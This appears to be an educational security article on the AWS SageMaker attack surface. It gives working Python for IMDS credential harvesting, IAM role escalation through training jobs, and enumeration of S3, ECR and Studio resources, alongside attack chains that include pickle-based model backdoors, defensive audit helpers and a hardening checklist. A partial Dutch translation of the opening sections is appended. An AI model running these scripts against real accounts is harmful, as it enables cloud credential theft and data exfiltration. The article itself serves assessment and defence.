The AWS SageMaker Attack Surface

Advanced | 13 min read | Updated 2026-03-13

Security assessment of AWS SageMaker: IAM role exploitation, endpoint abuse, notebook server attacks, and training pipeline manipulation.

aws sagemaker cloud ml-platform

SageMaker Architecture Overview

AWS SageMaker provides managed services for the full ML lifecycle: data labeling, notebooks, training, model hosting, and MLOps pipelines. Each component has its own trust boundaries and IAM requirements.

Key Components and Attack Surfaces

Component	IAM principal	Storage	Network	Risk level
Studio/Notebooks	Execution role	EFS/S3	VPC optional	High
Training Jobs	Training role	S3 input/output	VPC optional	High
Endpoints	Endpoint role	ECR/S3 model	Internet-facing	Critical
Pipelines	Pipeline role	S3 artifacts	VPC optional	Medium
Feature Store	Feature role	S3/Glue	VPC	Medium

Attack Techniques

1. Execution Role Exploitation

SageMaker notebook instances run with an IAM execution role. If the role is over-permissioned (a common finding, since data scientists need access to a variety of AWS services while experimenting), compromising the notebook grants broad access. The managed policy AmazonSageMakerFullAccess, which is often attached during setup, grants permissions far beyond what most notebooks need, including access to every S3 bucket with sagemaker in its name, ECR repositories, and CloudWatch logs across the whole account.

import boto3

# Enumerate the execution role from inside a SageMaker notebook
sts = boto3.client('sts')
identity = sts.get_caller_identity()
print(f"Role ARN: {identity['Arn']}")

# Check what the role can do
iam = boto3.client('iam')
# The STS ARN of an assumed role looks like
# arn:aws:sts::<account>:assumed-role/<role-name>/<session-name>,
# so the role name is the second path segment, not the last
role_name = identity['Arn'].split('/')[1]

# List the attached managed policies
policies = iam.list_attached_role_policies(RoleName=role_name)
for policy in policies['AttachedPolicies']:
    print(f"Policy: {policy['PolicyName']}")
    # Fetch the policy document to inspect its permissions
    version = iam.get_policy(PolicyArn=policy['PolicyArn'])['Policy']['DefaultVersionId']
    doc = iam.get_policy_version(PolicyArn=policy['PolicyArn'], VersionId=version)
    print(doc['PolicyVersion']['Document'])
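
The policy documents printed above can be long, so a small filter helps when reviewing them. The following is a minimal sketch, not part of boto3: `find_broad_statements` is a hypothetical helper name, and it assumes the policy document is already a parsed dict (which is how boto3 returns it from `get_policy_version`). It only flags Allow statements that contain a wildcard action or a bare `*` resource; it does not evaluate conditions or Deny statements.

```python
def find_broad_statements(policy_document):
    """Return Allow statements whose Action or Resource contains a wildcard."""
    statements = policy_document.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]

    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        # IAM accepts either a string or a list for both fields
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources

        wildcard_actions = [a for a in actions if "*" in a]
        wildcard_resources = [r for r in resources if r == "*"]
        if wildcard_actions or wildcard_resources:
            findings.append({
                "sid": stmt.get("Sid", "<no Sid>"),
                "wildcard_actions": wildcard_actions,
                "wildcard_resources": wildcard_resources,
            })
    return findings


# Illustrative policy document (bucket name is a placeholder)
example = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "Narrow", "Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-bucket/train/*"},
        {"Sid": "Broad", "Effect": "Allow",
         "Action": ["s3:*", "ecr:GetAuthorizationToken"], "Resource": "*"},
    ],
}
for finding in find_broad_statements(example):
    print(finding)
```

In the notebook enumeration, the same function could be called on `doc['PolicyVersion']['Document']` instead of printing the whole document.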

Privilege Escalation via Role Chaining

SageMaker environments often involve multiple IAM roles: the notebook execution role, training job roles, endpoint roles, and pipeline execution roles. If the execution role can pass roles to other SageMaker resources (via iam:PassRole), an attacker can escalate privileges by launching a training job with a more privileged role.

import boto3
import json
 
iam = boto3.client('iam')
sm = boto3.client('sagemaker')
sts = boto3.client('sts')
 
identity = sts.get_caller_identity()
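# For an assumed role the STS ARN ends in <role-name>/<session-name>,
# so take the second path segment rather than the last
current_role = identity['Arn'].split('/')[1]

# Check whether the role can pass other roles
try:
    # List all roles in the account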
    roles = iam.list_roles()['Roles']
    sagemaker_roles = [
        r for r in roles
        if 'sagemaker' in r['RoleName'].lower()
        or 'SageMaker' in json.dumps(r.get('AssumeRolePolicyDocument', {}))
    ]
 
    print(f"Current role: {current_role}")
    print(f"SageMaker-related roles found: {len(sagemaker_roles)}")
    for role in sagemaker_roles:
        print(f"  {role['RoleName']} - {role['Arn']}")
 
        # List this role's attached policies to see whether it has more permissions
        attached = iam.list_attached_role_policies(
            RoleName=role['RoleName']
        )['AttachedPolicies']
        for policy in attached:
            print(f"    Policy: {policy['PolicyName']}")
 
except Exception as e:
    print(f"Cannot enumerate roles: {e}")
 
# Attempt to create a training job with a more privileged role
def escalate_via_training_job(target_role_arn):
    """Launch a training job that runs under a more privileged role;
    code in the training container can then use that role's credentials."""
    sm.create_training_job(
        TrainingJobName='security-test-escalation',
        RoleArn=target_role_arn,  # The more privileged role
        AlgorithmSpecification={
            'TrainingImage': '763104351884.dkr.ecr.us-east-1.amazonaws.com/'
                             'pytorch-training:2.0.0-cpu-py310',
            'TrainingInputMode': 'File'
        },
        ResourceConfig={
            'InstanceType': 'ml.m5.large',
            'InstanceCount': 1,
            'VolumeSizeInGB': 10
        },
        StoppingCondition={'MaxRuntimeInSeconds': 300},
        InputDataConfig=[{
            'ChannelName': 'training',
            'DataSource': {
                'S3DataSource': {
                    'S3DataType': 'S3Prefix',
                    'S3Uri': 's3://bucket/data/'
                }
            }
        }],
        OutputDataConfig={
            'S3OutputPath': 's3://bucket/output/'
        }
    )
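
Whether the escalation above is possible depends on how iam:PassRole is granted. As a rough sketch under stated assumptions, the helper below inspects a parsed policy document and reports each Allow statement that grants iam:PassRole, noting whether it applies to any role and whether it is restricted by an `iam:PassedToService` condition. The function names are hypothetical, and the check is purely syntactic: it ignores Deny statements, permission boundaries, and SCPs.

```python
from fnmatch import fnmatchcase


def _as_list(value):
    """IAM fields may be a single string or a list; normalize to a list."""
    return [value] if isinstance(value, str) else list(value or [])


def passrole_findings(policy_document):
    """Flag Allow statements that grant iam:PassRole and note missing guards."""
    statements = policy_document.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]

    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        # IAM action names are case-insensitive and may contain wildcards
        grants = [a for a in _as_list(stmt.get("Action"))
                  if fnmatchcase("iam:passrole", a.lower())]
        if not grants:
            continue
        # Collect the condition keys used under any condition operator
        condition_keys = {
            key.lower()
            for operator in stmt.get("Condition", {}).values()
            for key in operator
        }
        findings.append({
            "actions": grants,
            "any_role": "*" in _as_list(stmt.get("Resource")),
            "service_restricted": "iam:passedtoservice" in condition_keys,
        })
    return findings
```

A statement reported with `any_role` set and `service_restricted` unset is the pattern that lets a notebook role hand an arbitrary role to a training job.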

2. IMDS Credential Harvesting

SageMaker notebook instances expose the Instance Metadata Service. Older instances default to IMDSv1 (no session token required), which makes credential theft trivial. Even with IMDSv2, code running in the notebook context can issue the required PUT request to obtain a session token.

# Older SageMaker notebook instances default to IMDSv1 (newer configurations may use v2)
import requests

# Retrieve temporary credentials from the instance metadata
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/'
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}'
).json()
 
print(f"AccessKeyId: {creds['AccessKeyId']}")
print(f"SecretAccessKey: {creds['SecretAccessKey']}")
print(f"Token: {creds['Token']}")

IMDSv2 Credential Harvesting

When IMDSv2 is enforced, the attacker must first obtain a session token. This is still possible from code running on the instance.

import requests
 
# IMDSv2 requires a PUT request first to obtain a session token
token_resp = requests.put(
    'http://169.254.169.254/latest/api/token',
    headers={'X-aws-ec2-metadata-token-ttl-seconds': '21600'}
)
imds_token = token_resp.text
 
# Use the token to access the metadata
headers = {'X-aws-ec2-metadata-token': imds_token}
 
# Retrieve the instance identity document
identity = requests.get(
    'http://169.254.169.254/latest/dynamic/instance-identity/document',
    headers=headers
).json()
print(f"Region: {identity['region']}")
print(f"Account: {identity['accountId']}")
print(f"Instance: {identity['instanceId']}")
 
# Retrieve the credentials
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
    headers=headers
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}',
    headers=headers
).json()
print(f"Access Key: {creds['AccessKeyId']}")
print(f"Expiration: {creds['Expiration']}")
 
# Also extract user data (may contain initialization scripts with secrets)
user_data = requests.get(
    'http://169.254.169.254/latest/user-data',
    headers=headers
).text
print(f"User data length: {len(user_data)} bytes")
if user_data:
    # Check for common secret keywords in the user data
    for keyword in ['password', 'secret', 'token', 'key', 'credential']:
        if keyword.lower() in user_data.lower():
            print(f"  [!] User data may contain '{keyword}'")
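
From the defender's side, the IMDS setting of each notebook instance can be audited through the SageMaker API. The sketch below assumes the `InstanceMetadataServiceConfiguration` field returned by `describe_notebook_instance`; the function names are hypothetical, and a missing field is treated as IMDSv1 being allowed, which is a deliberately conservative assumption.

```python
def imds_finding(notebook_description):
    """Classify a DescribeNotebookInstance response by its IMDS setting."""
    config = notebook_description.get("InstanceMetadataServiceConfiguration", {})
    # Assumption: treat a missing value as IMDSv1 still being allowed
    minimum = config.get("MinimumInstanceMetadataServiceVersion", "1")
    name = notebook_description.get("NotebookInstanceName", "<unknown>")
    if minimum == "2":
        return {"instance": name, "severity": "INFO", "finding": "IMDSv2 enforced"}
    return {"instance": name, "severity": "HIGH", "finding": "IMDSv1 still allowed"}


def audit_notebooks(sm_client):
    """Apply imds_finding to every notebook instance visible to the client."""
    findings = []
    paginator = sm_client.get_paginator("list_notebook_instances")
    for page in paginator.paginate():
        for summary in page["NotebookInstances"]:
            detail = sm_client.describe_notebook_instance(
                NotebookInstanceName=summary["NotebookInstanceName"]
            )
            findings.append(imds_finding(detail))
    return findings
```

Calling `audit_notebooks(boto3.client('sagemaker'))` would produce one finding per instance; the client is passed in so the classification logic can be exercised without AWS access.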

3. Endpoint Enumeration and Testing

SageMaker endpoints serve model predictions and are often the most exposed component: they handle production traffic and may be reachable from VPCs, other AWS accounts, or even the internet via API Gateway.

import boto3
 
sm = boto3.client('sagemaker')
runtime = boto3.client('sagemaker-runtime')
 
# List all endpoints
endpoints = sm.list_endpoints()['Endpoints']
for ep in endpoints:
    config = sm.describe_endpoint(EndpointName=ep['EndpointName'])
    print(f"Endpoint: {ep['EndpointName']}")
    print(f"  Status: {config['EndpointStatus']}")
    print(f"  Created: {config['CreationTime']}")
 
    # Attempt an invocation
    try:
        response = runtime.invoke_endpoint(
            EndpointName=ep['EndpointName'],
            ContentType='application/json',
            Body='{"inputs": "test"}'
        )
        print(f"  Response: {response['Body'].read()[:200]}")
    except Exception as e:
        print(f"  Error: {e}")

In-Depth Endpoint Security Analysis

import boto3
import json
 
sm = boto3.client('sagemaker')
 
def analyze_endpoint_security(endpoint_name):
    """Comprehensive security assessment of an endpoint."""
    # Retrieve the endpoint config
    endpoint = sm.describe_endpoint(EndpointName=endpoint_name)
    config_name = endpoint['EndpointConfigName']
    config = sm.describe_endpoint_config(EndpointConfigName=config_name)
 
    results = {"endpoint": endpoint_name, "findings": []}
 
    # Check the VPC configuration of each production variant
    for variant in config['ProductionVariants']:
        model = sm.describe_model(ModelName=variant['ModelName'])

        # Check whether the model runs in a VPC
        if 'VpcConfig' not in model:
            results["findings"].append({
                "severity": "HIGH",
                "finding": f"Model {variant['ModelName']} not in VPC"
            })
 
        # Record the model's execution role
        role_arn = model['ExecutionRoleArn']
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Model role: {role_arn}"
        })
 
        # Record the source of the container image
        container = model.get('PrimaryContainer', {})
        image = container.get('Image', 'Unknown')
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Container image: {image}"
        })
 
        # Check for model data (S3 path to the model artifacts)
        model_data = container.get('ModelDataUrl')
        if model_data:
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Model artifacts at: {model_data}"
            })
 
    # Check the data capture configuration (may leak inference data)
    if 'DataCaptureConfig' in config:
        capture = config['DataCaptureConfig']
        if capture.get('EnableCapture'):
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Data capture enabled -> {capture.get('DestinationS3Uri')}"
            })
 
    return results
 
# Run the analysis for every endpoint
for ep in sm.list_endpoints()['Endpoints']:
    analysis = analyze_endpoint_security(ep['EndpointName'])
    print(json.dumps(analysis, indent=2, default=str))

4. Training Data Exfiltration

SageMaker stores training data, model artifacts, and pipeline outputs in S3. The default bucket naming convention (sagemaker-{region}-{account_id}) makes discovery straightforward. Beyond the default bucket, training jobs reference S3 paths for input and output that may point to sensitive data lakes.

import boto3

# Enumerate S3 buckets used by SageMaker
s3 = boto3.client('s3')
buckets = s3.list_buckets()['Buckets']
sagemaker_buckets = [b for b in buckets if 'sagemaker' in b['Name'].lower()]
 
for bucket in sagemaker_buckets:
    print(f"\nBucket: {bucket['Name']}")
    objects = s3.list_objects_v2(Bucket=bucket['Name'], MaxKeys=20)
    for obj in objects.get('Contents', []):
        print(f"  {obj['Key']} ({obj['Size']} bytes)")
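
Because the default bucket name follows the sagemaker-{region}-{account_id} convention described above, candidate names can be derived without listing buckets at all. The sketch below only builds the names; the function names are hypothetical and the account ID and regions are placeholders.

```python
def default_sagemaker_bucket(region, account_id):
    """Build the default bucket name from the documented convention."""
    # account_id is kept as a string so leading zeros are preserved
    return f"sagemaker-{region}-{account_id}"


def candidate_buckets(account_id, regions):
    """One candidate default bucket per region."""
    return [default_sagemaker_bucket(region, account_id) for region in regions]


# Placeholder account ID and regions for illustration
print(candidate_buckets("111122223333", ["us-east-1", "eu-west-1"]))
```

For a reviewer, the same list is a quick inventory of buckets whose policies and logging should be checked first.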

Extracting Training Data from the Job History

import boto3
 
sm = boto3.client('sagemaker')
s3 = boto3.client('s3')
 
# List recent training jobs to find data locations
jobs = sm.list_training_jobs(
    SortBy='CreationTime',
    SortOrder='Descending',
    MaxResults=20
)
 
for job_summary in jobs['TrainingJobSummaries']:
    job = sm.describe_training_job(
        TrainingJobName=job_summary['TrainingJobName']
    )
    print(f"\nJob: {job['TrainingJobName']}")
    print(f"  Status: {job['TrainingJobStatus']}")
    print(f"  Role: {job['RoleArn']}")
 
    # Extract the input data locations
    for channel in job.get('InputDataConfig', []):
        # A channel may use a file system data source instead of S3
        s3_uri = channel['DataSource'].get('S3DataSource', {}).get('S3Uri', 'N/A')
        print(f"  Input ({channel['ChannelName']}): {s3_uri}")
 
    # Extract the output location
    output_uri = job['OutputDataConfig']['S3OutputPath']
    print(f"  Output: {output_uri}")
 
    # Extract the model artifacts (the trained model)
    if 'ModelArtifacts' in job:
        model_uri = job['ModelArtifacts']['S3ModelArtifacts']
        print(f"  Model: {model_uri}")
 
    # Check the hyperparameters (may contain secrets or API keys)
    hyperparams = job.get('HyperParameters', {})
    for key, value in hyperparams.items():
        if any(kw in key.lower() for kw in
               ['key', 'secret', 'token', 'password', 'api']):
            print(f"  [!] Suspicious hyperparameter: {key}={value[:20]}...")

5. ECR Container Image Attacks

SageMaker uses Amazon ECR to store container images for training and inference. Compromising ECR access enables supply chain attacks in which legitimate images are replaced with backdoored versions that exfiltrate data or inject model backdoors during training.

import boto3
import json
 
ecr = boto3.client('ecr')
 
# List all repositories
repos = ecr.describe_repositories()['repositories']
ml_repos = [r for r in repos if any(
    kw in r['repositoryName'].lower()
    for kw in ['sagemaker', 'ml', 'model', 'inference', 'training']
)]
 
for repo in ml_repos:
    print(f"\nRepository: {repo['repositoryName']}")
    print(f"  URI: {repo['repositoryUri']}")
    print(f"  Created: {repo['createdAt']}")
 
    # Check the image scan findings
    images = ecr.list_images(
        repositoryName=repo['repositoryName'],
        maxResults=5
    )['imageIds']
 
    for image in images:
        if 'imageTag' in image:
            print(f"  Image: {image['imageTag']}")
            try:
                scan = ecr.describe_image_scan_findings(
                    repositoryName=repo['repositoryName'],
                    imageId=image
                )
                vulns = scan['imageScanFindings']['findingSeverityCounts']
                print(f"    Vulnerabilities: {json.dumps(vulns)}")
            except ecr.exceptions.ScanNotFoundException:
                print(f"    [!] No vulnerability scan results")
 
    # Check the repository policy (who can push/pull)
    try:
        policy = ecr.get_repository_policy(
            repositoryName=repo['repositoryName']
        )
        policy_doc = json.loads(policy['policyText'])
        for stmt in policy_doc.get('Statement', []):
            print(f"  Policy: {stmt.get('Effect')} - "
                  f"{stmt.get('Principal', {})}")
    except ecr.exceptions.RepositoryPolicyNotFoundException:
        print(f"  No repository policy (default account access only)")
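
Image replacement is easiest when tags are mutable and nothing scans what gets pushed. As a minimal sketch, the helper below reads two fields from a `describe_repositories` entry, `imageTagMutability` and `imageScanningConfiguration.scanOnPush`, and returns plain-text findings. The function name is hypothetical, and the check looks only at repository-level settings; a registry-level scanning configuration, if one is in use, would not be reflected here.

```python
def repository_findings(repo):
    """Return hardening gaps for one entry from ecr.describe_repositories()."""
    findings = []
    # Mutable tags let an existing tag be pointed at a different image
    if repo.get("imageTagMutability", "MUTABLE") != "IMMUTABLE":
        findings.append("tags are mutable: an existing tag can be overwritten")
    scanning = repo.get("imageScanningConfiguration", {})
    if not scanning.get("scanOnPush", False):
        findings.append("scan on push is disabled at the repository level")
    return findings


# Illustrative repository entries (names are placeholders)
repos_example = [
    {"repositoryName": "ml-inference", "imageTagMutability": "MUTABLE",
     "imageScanningConfiguration": {"scanOnPush": False}},
    {"repositoryName": "ml-training", "imageTagMutability": "IMMUTABLE",
     "imageScanningConfiguration": {"scanOnPush": True}},
]
for repo in repos_example:
    print(repo["repositoryName"], repository_findings(repo))
```

In the enumeration loop above, `repository_findings(repo)` could be called for each entry of `ml_repos`.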

6. SageMaker Studio Domain Exploitation

SageMaker Studio organizes user environments into domains and user profiles. A compromised Studio domain can expose the work of all users, shared spaces, and the underlying EFS file system that stores notebooks and data.

import boto3
 
sm = boto3.client('sagemaker')
efs = boto3.client('efs')
 
# List Studio domains
domains = sm.list_domains()['Domains']
for domain in domains:
    detail = sm.describe_domain(DomainId=domain['DomainId'])
    print(f"\nDomain: {detail['DomainName']}")
    print(f"  Auth: {detail['AuthMode']}")
    print(f"  VPC: {detail.get('VpcId', 'No VPC')}")
    print(f"  EFS: {detail.get('HomeEfsFileSystemId', 'N/A')}")
 
    # The default execution role applies to all users unless a profile overrides it
    default_settings = detail.get('DefaultUserSettings', {})
    print(f"  Default role: {default_settings.get('ExecutionRole', 'N/A')}")
 
    # List user profiles
    profiles = sm.list_user_profiles(DomainIdEquals=domain['DomainId'])
    for profile in profiles['UserProfiles']:
        user_detail = sm.describe_user_profile(
            DomainId=domain['DomainId'],
            UserProfileName=profile['UserProfileName']
        )
        user_role = user_detail.get('UserSettings', {}).get('ExecutionRole')
        print(f"  User: {profile['UserProfileName']} "
              f"(role: {user_role or 'uses default'})")
 
    # Check whether the EFS file system is accessible
    if 'HomeEfsFileSystemId' in detail:
        efs_id = detail['HomeEfsFileSystemId']
        try:
            fs = efs.describe_file_systems(FileSystemId=efs_id)
            print(f"  EFS size: {fs['FileSystems'][0]['SizeInBytes']['Value']} bytes")
            # Check the mount targets for network exposure
            mounts = efs.describe_mount_targets(FileSystemId=efs_id)
            for mt in mounts['MountTargets']:
                print(f"  EFS mount: {mt['IpAddress']} in {mt['SubnetId']}")
        except Exception as e:
            print(f"  EFS access error: {e}")

Defensive Assessment Checklist

Control area	What to verify	Common finding
IAM roles	Least-privilege execution roles per component	`AmazonSageMakerFullAccess` attached to all roles
IMDS	IMDSv2 enforced on notebook instances	IMDSv1 still enabled (default on older instances)
Network	VPC isolation for notebooks, training, and endpoints	No VPC configuration (default)
S3	Bucket policies, encryption, versioning, access logging	Public or overly permissive bucket policies
ECR	Image scanning, repository policies, immutable tags	No vulnerability scanning configured
Logging	CloudTrail, CloudWatch, SageMaker Experiments logging	Incomplete logging of SageMaker API calls
Encryption	KMS keys for S3, EBS, EFS, and inter-node training traffic	Default AWS-managed keys (no customer control)
Endpoint	IAM authorization, VPC endpoints, resource policies	No IAM conditions on endpoint invocation

Recommended Hardening

Replace AmazonSageMakerFullAccess with custom policies scoped to specific S3 paths, ECR repositories, and SageMaker resources.
Enforce IMDSv2 on all notebook instances by setting MinimumInstanceMetadataServiceVersion to 2.
Place all components in a VPC with private subnets and VPC endpoints for S3, ECR, the SageMaker API, and SageMaker Runtime.
Enable S3 bucket versioning and access logging on all SageMaker-related buckets to detect unauthorized access or modification.
Use separate IAM roles for notebooks, training jobs, and endpoints, each limited to only the resources it needs.
Enable ECR image scanning and enforce image immutability to prevent supply chain attacks.
Enable CloudTrail data events for S3 buckets that hold training data and model artifacts.
Use SageMaker Model Cards and the Model Registry to track model provenance and prevent unauthorized model deployment.
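
The IMDSv2 recommendation in the list above maps to a single API call. The following is a sketch rather than a complete remediation script: `enforce_imdsv2` is a hypothetical helper, the client is passed in explicitly, and it assumes the `InstanceMetadataServiceConfiguration` parameter of `update_notebook_instance`. Depending on the instance's state, the update may be rejected until the instance is stopped, so error handling would be needed in practice.

```python
def enforce_imdsv2(sm_client, notebook_name):
    """Request IMDSv2-only metadata access for one notebook instance."""
    sm_client.update_notebook_instance(
        NotebookInstanceName=notebook_name,
        InstanceMetadataServiceConfiguration={
            # "2" means session tokens are required for every metadata request
            "MinimumInstanceMetadataServiceVersion": "2"
        },
    )
```

With real credentials this would be called as `enforce_imdsv2(boto3.client('sagemaker'), 'my-notebook')`, where the instance name is a placeholder.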

Common Attack Chains

Chain 1: From Notebook to Full Account Compromise

1. Initial access: Compromised data scientist credentials or malicious .ipynb file
2. IMDS credential harvesting from notebook instance
3. Enumerate IAM role permissions -- discover AmazonSageMakerFullAccess
4. List S3 buckets matching sagemaker-* pattern
5. Access training data, model artifacts, and pipeline outputs
6. Discover iam:PassRole permission in the execution role
7. Launch training job with a higher-privilege role
8. Use escalated role to access non-SageMaker resources (RDS, DynamoDB, etc.)

Chain 2: Model Registry Poisoning

1. Gain access to a SageMaker execution role with model registry permissions
2. Download the latest approved model from S3
3. Modify model artifact to include a backdoor (e.g., pickle-based RCE in PyTorch model)
4. Register the modified model as a new version in the model registry
5. If automatic deployment is configured, the backdoored model reaches production
6. Backdoored model executes attacker code on every inference request
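
Step 3 of this chain relies on pickle being able to import and call arbitrary objects during loading. One way to inspect an artifact without loading it is to walk its opcodes with the standard library's `pickletools`. The sketch below is a coarse triage aid, not a safe-loading mechanism: the opcode set and the function name are assumptions chosen for illustration, and legitimate framework checkpoints also use these opcodes, so hits need to be compared against an allowlist of expected imports. Newer PyTorch checkpoints are zip archives, in which case the embedded pickle would have to be extracted first.

```python
import pickle
import pickletools

# Opcodes that import names or construct/call objects during unpickling
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def suspicious_pickle_opcodes(data):
    """Return (opcode name, argument) pairs found in a pickle byte string.

    The pickle is only parsed, never executed.
    """
    return [
        (opcode.name, arg)
        for opcode, arg, _pos in pickletools.genops(data)
        if opcode.name in SUSPICIOUS_OPCODES
    ]


class Payload:
    def __reduce__(self):
        # Harmless stand-in for an attacker-chosen callable
        return (len, ("abc",))


benign = pickle.dumps({"weights": [0.1, 0.2]})
crafted = pickle.dumps(Payload())  # serializing does not run the callable

print(suspicious_pickle_opcodes(benign))
print([name for name, _ in suspicious_pickle_opcodes(crafted)])
```

Plain containers of numbers and strings produce no hits, while the crafted object shows an import opcode followed by a call, which is the shape a pickle-based backdoor takes.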

Chain 3: Cross-Account Pivot via an Endpoint

1. Discover SageMaker endpoint with cross-account IAM trust
2. Invoke endpoint with crafted payloads to test for model vulnerabilities
3. If model inference container has outbound network access, use it as proxy
4. Leverage endpoint role's cross-account permissions to access resources
   in other AWS accounts within the organization

MITRE ATLAS Mapping for SageMaker Attacks

Attack technique	ATLAS ID	SageMaker-specific context
IMDS credential harvesting	AML.TA0002 (Initial Access)	Notebook execution roles with broad S3/ECR access
S3 training data access	AML.T0000 (Search for Victim's Data)	Default `sagemaker-*` bucket naming convention eases discovery
Endpoint enumeration	AML.T0002 (Active Scanning)	`sagemaker:ListEndpoints` reveals all deployed models
Model extraction via endpoint	AML.T0024 (Model Extraction)	Endpoint invocation with systematic queries
ECR image tampering	AML.T0018 (Backdoor ML Model)	Replacing the inference container image in ECR
Training data poisoning	AML.T0020 (Data Poisoning)	Modifying S3 training data between pipeline runs

Related Topics

Cloud AI Infrastructure: cross-platform overview
API Security: endpoint security fundamentals
Model Supply Chain: securing model artifacts


Het aanvalsoppervlak van AWS SageMaker

Gevorderd13 min lezenBijgewerkt op 2026-03-13

Beveiligingsbeoordeling van AWS SageMaker -- exploitatie van IAM-rollen, misbruik van endpoints, aanvallen op notebookservers en manipulatie van trainingspipelines.

aws sagemaker cloud ml-platform

Overzicht van de SageMaker-architectuur

Belangrijkste componenten en aanvalsoppervlakken

Component	IAM-principal	Opslag	Netwerk	Risiconiveau
Studio/Notebooks	Execution role	EFS/S3	VPC optioneel	Hoog
Training Jobs	Training role	S3 input/output	VPC optioneel	Hoog
Endpoints	Endpoint role	ECR/S3 model	Internetgericht	Kritiek
Pipelines	Pipeline role	S3 artifacts	VPC optioneel	Gemiddeld
Feature Store	Feature role	S3/Glue	VPC	Gemiddeld

Aanvalstechnieken

1. Exploitatie van de execution role

import boto3
import requests
 
# Vanuit een SageMaker-notebook de execution role enumereren
sts = boto3.client('sts')
identity = sts.get_caller_identity()
print(f"Role ARN: {identity['Arn']}")
 
# Controleren wat de rol kan doen
iam = boto3.client('iam')
role_name = identity['Arn'].split('/')[-1]
 
# Gekoppelde policies opsommen
policies = iam.list_attached_role_policies(RoleName=role_name)
for policy in policies['AttachedPolicies']:
    print(f"Policy: {policy['PolicyName']}")
    # Policy-document ophalen om rechten te controleren
    version = iam.get_policy(PolicyArn=policy['PolicyArn'])['Policy']['DefaultVersionId']
    doc = iam.get_policy_version(PolicyArn=policy['PolicyArn'], VersionId=version)
    print(doc['PolicyVersion']['Document'])

Privilege-escalatie via role chaining

import boto3
import json
 
iam = boto3.client('iam')
sm = boto3.client('sagemaker')
sts = boto3.client('sts')
 
identity = sts.get_caller_identity()
current_role = identity['Arn'].split('/')[-1]
 
# Controleren of de rol andere rollen kan doorgeven
try:
    # Alle rollen in het account opsommen
    roles = iam.list_roles()['Roles']
    sagemaker_roles = [
        r for r in roles
        if 'sagemaker' in r['RoleName'].lower()
        or 'SageMaker' in json.dumps(r.get('AssumeRolePolicyDocument', {}))
    ]
 
    print(f"Current role: {current_role}")
    print(f"SageMaker-related roles found: {len(sagemaker_roles)}")
    for role in sagemaker_roles:
        print(f"  {role['RoleName']} - {role['Arn']}")
 
        # Controleren of deze rol meer rechten heeft
        attached = iam.list_attached_role_policies(
            RoleName=role['RoleName']
        )['AttachedPolicies']
        for policy in attached:
            print(f"    Policy: {policy['PolicyName']}")
 
except Exception as e:
    print(f"Cannot enumerate roles: {e}")
 
# Proberen een trainingsjob te maken met een rol die meer privileges heeft
def escalate_via_training_job(target_role_arn):
    """Een trainingsjob starten die credentials exfiltreert uit een
    rol met meer privileges."""
    sm.create_training_job(
        TrainingJobName='security-test-escalation',
        RoleArn=target_role_arn,  # De rol met meer privileges
        AlgorithmSpecification={
            'TrainingImage': '763104351884.dkr.ecr.us-east-1.amazonaws.com/'
                             'pytorch-training:2.0.0-cpu-py310',
            'TrainingInputMode': 'File'
        },
        ResourceConfig={
            'InstanceType': 'ml.m5.large',
            'InstanceCount': 1,
            'VolumeSizeInGB': 10
        },
        StoppingCondition={'MaxRuntimeInSeconds': 300},
        InputDataConfig=[{
            'ChannelName': 'training',
            'DataSource': {
                'S3DataSource': {
                    'S3DataType': 'S3Prefix',
                    'S3Uri': 's3://bucket/data/'
                }
            }
        }],
        OutputDataConfig={
            'S3OutputPath': 's3://bucket/output/'
        }
    )

2. IMDS-credentialoogst

# SageMaker-instances gebruiken standaard IMDS v1 (kan v2 zijn in nieuwere configs)
import requests
 
# Tijdelijke credentials ophalen uit de instance-metadata
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/'
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}'
).json()
 
print(f"AccessKeyId: {creds['AccessKeyId']}")
print(f"SecretAccessKey: {creds['SecretAccessKey']}")
print(f"Token: {creds['Token']}")

IMDSv2-credentialoogst

Wanneer IMDSv2 wordt afgedwongen, moet de aanvaller eerst een sessietoken verkrijgen. Dit is nog steeds mogelijk vanuit code die op de instance draait.

import requests
 
# IMDSv2 vereist eerst een PUT om een sessietoken te verkrijgen
token_resp = requests.put(
    'http://169.254.169.254/latest/api/token',
    headers={'X-aws-ec2-metadata-token-ttl-seconds': '21600'}
)
imds_token = token_resp.text
 
# Het token gebruiken om de metadata te benaderen
headers = {'X-aws-ec2-metadata-token': imds_token}
 
# Het instance-identity-document ophalen
identity = requests.get(
    'http://169.254.169.254/latest/dynamic/instance-identity/document',
    headers=headers
).json()
print(f"Region: {identity['region']}")
print(f"Account: {identity['accountId']}")
print(f"Instance: {identity['instanceId']}")
 
# Credentials ophalen
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
    headers=headers
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}',
    headers=headers
).json()
print(f"Access Key: {creds['AccessKeyId']}")
print(f"Expiration: {creds['Expiration']}")
 
# Ook user-data extraheren (kan initialisatiescripts met secrets bevatten)
user_data = requests.get(
    'http://169.254.169.254/latest/user-data',
    headers=headers
).text
print(f"User data length: {len(user_data)} bytes")
if user_data:
    # Controleren op veelvoorkomende secrets in user data
    for keyword in ['password', 'secret', 'token', 'key', 'credential']:
        if keyword.lower() in user_data.lower():
            print(f"  [!] User data may contain '{keyword}'")

